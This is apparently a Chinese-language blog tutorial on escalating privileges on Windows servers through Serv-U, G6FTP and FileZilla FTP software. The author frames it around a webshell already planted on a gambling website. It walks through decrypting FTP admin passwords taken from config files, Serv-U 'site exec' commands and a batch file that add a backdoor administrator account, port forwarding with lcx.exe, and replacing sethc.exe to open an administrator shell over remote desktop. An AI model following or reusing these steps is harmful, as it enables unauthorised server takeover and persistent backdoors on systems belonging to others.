windows提權之ftp提權
windows提權之ftp提權
0,起因,由於前幾天拿了一個菠菜站的webshell,但是隻有iis許可權,執行無法建立使用者等操作,更無法對整個伺服器進行控制了,於是此時便需要提權了,對於一個剛剛入門的小白來說,此刻真正意識到了提權的重要性,於是便開始學習提取相關知識,以拿下該菠菜的站點。
提權前的準備工作
1,通常來說,不同的指令碼所處的許可權是不一樣的。這就意味著,如果該站點支援許可權更高的指令碼,我們可以上傳該許可權更高的指令碼的大馬,進而拿到更高的許可權。
- asp/php 通常為匿名許可權(網路服務許可權)
- aspx 通常為user許可權
- jsp 通常為系統許可權
2,提權中常常也需要進行資訊收集:
- 內外網
- 伺服器系統和版本位數
- 伺服器的補丁情況
- 伺服器的安裝軟體情況
- 伺服器的防護軟體情況
- 埠情況
- 所支援的指令碼情況
- ...............................等等
3,windows資訊收集中常用的命令:
ipconfig /all檢視當前ip net user檢視當前伺服器賬號情況 netstat -ano檢視當前伺服器埠開放情況 ver檢視當前伺服器作業系統 systeminfo檢視當前伺服器配置資訊(補丁情況) tasklist /svc檢視當前伺服器程序情況 taskkill -pid pid號結束某個pid號的程序 taskkill /im qq.exe /f 結束qq程序,如果對命令不清楚,可以使用taskkill /? 進行檢視 net user v01cano v01cano /add 新增一個使用者名稱為v01cano密碼為v01cano的使用者 net localgroup administrators v01cano /add 將使用者v01cano新增到管理員組 whoami檢視當前操作使用者(當前許可權)
4,FTP軟體提權:
常見的FTP軟體有server-u,g6ftp,filezilla。
server-u提權
- Server -u的預設埠為43958
server-u提權常用方法,一:
1,檢視預設安裝目錄下的ServUDaemon.ini檔案,進而檢視使用者名稱和密碼,將密碼去cmd5.com找到對應的server-u的解密方式進行解密。
2,登入ftp,執行如下命令,建立使用者,並且加入到管理員組。
quote site exec net user v01cano v01cano /add quote site exec net localgroup administrators v01cano /add
server-u提權常用方法二:
1,使用大馬直接建立ftp賬號,使用ftp賬號登入ftp。
2,然後再執行如下命令,建立系統賬號。
quote site exec net user v01cano v01cano /add quote site exec net localgroup administrators v01cano /add
server-u提權常用方法三:
server-u的管理員賬號許可權較大,相當於系統許可權,可以通過管理員賬號直接建立使用者,並且加入到管理員組。
g6ftp提權:
科普:g6ftp的預設埠為8021,只偵聽在127.0.0.1的8021埠上,所以無法從外部直接訪問,需要進行埠轉發。
1,查詢管理配置檔案Remote.ini,將administrator管理密碼解密。解密得到administrator的管理員密碼為123456
2,首先進行查詢該網站的可讀可寫目錄,然後上傳cmd.exe和lcx.exe到該目錄下。
3,檢視網站根目錄的許可權得知,此處網站的根目錄可讀可寫,直接上傳到網站跟目錄即可。上傳成功後,即可直接通過cmd.exe呼叫lcx.exe命令,檢視lcx.exe的用法。
然後通過如下命令轉發埠,將127.0.0.1的8021埠通過8427埠轉發出去:
4,轉發成功後,通過g6ftp軟體進行連線,以管理員使用者登入
連線成功:
5,建立使用者並設定許可權和執行批處理檔案
建立使用者:右鍵,選擇new user
選擇根目錄為c盤:
賦予全部許可權:
然後將批處理檔案adduser.bat上傳到目標站點中:
adduser.bat中的檔案內容為:即新建一個使用者名稱和密碼均為v01cano的使用者,並且加入到管理員組中。
net user v01cano v01cano /add net localgroup administrators v01cano /add
然後在g6ftp軟體中加入批處理命令:
然後在控制檯登入ftp,並且執行所加入的批處理命令:命令成功執行:
在目標機上檢視,新建使用者成功,並且成功加入到了管理員組。
提權成功。
filezilla提權:
科普:filezilla預設埠為14147埠
1,找到預設安裝目錄下面有兩個敏感檔案filezillaserver.xml(包含了使用者資訊)和filezillaserver interface.xml(包含了管理資訊),檢視使用者名稱和密碼:
2,進行埠轉發,方法類似g6ftp:
3,使用filezilla軟體進行遠端連線:
4,新建使用者並設定使用者的根目錄。
5,開啟filezilla客戶端軟體,使用剛剛新建的使用者名稱和密碼進行連線:
6,連線成功以後,替換c:/windows/system32/sethc.exe檔案。
7,直接遠端連線即可,win+r輸入mstsc即可開啟遠端桌面。輸入靶機ip進行連線:不需要輸入使用者名稱和密碼,直接連續按下5次shift鍵,即可以管理員的身份開啟cmd,然後建立使用者,或者直接輸入explorer.exe,進入靶機。遠控成功。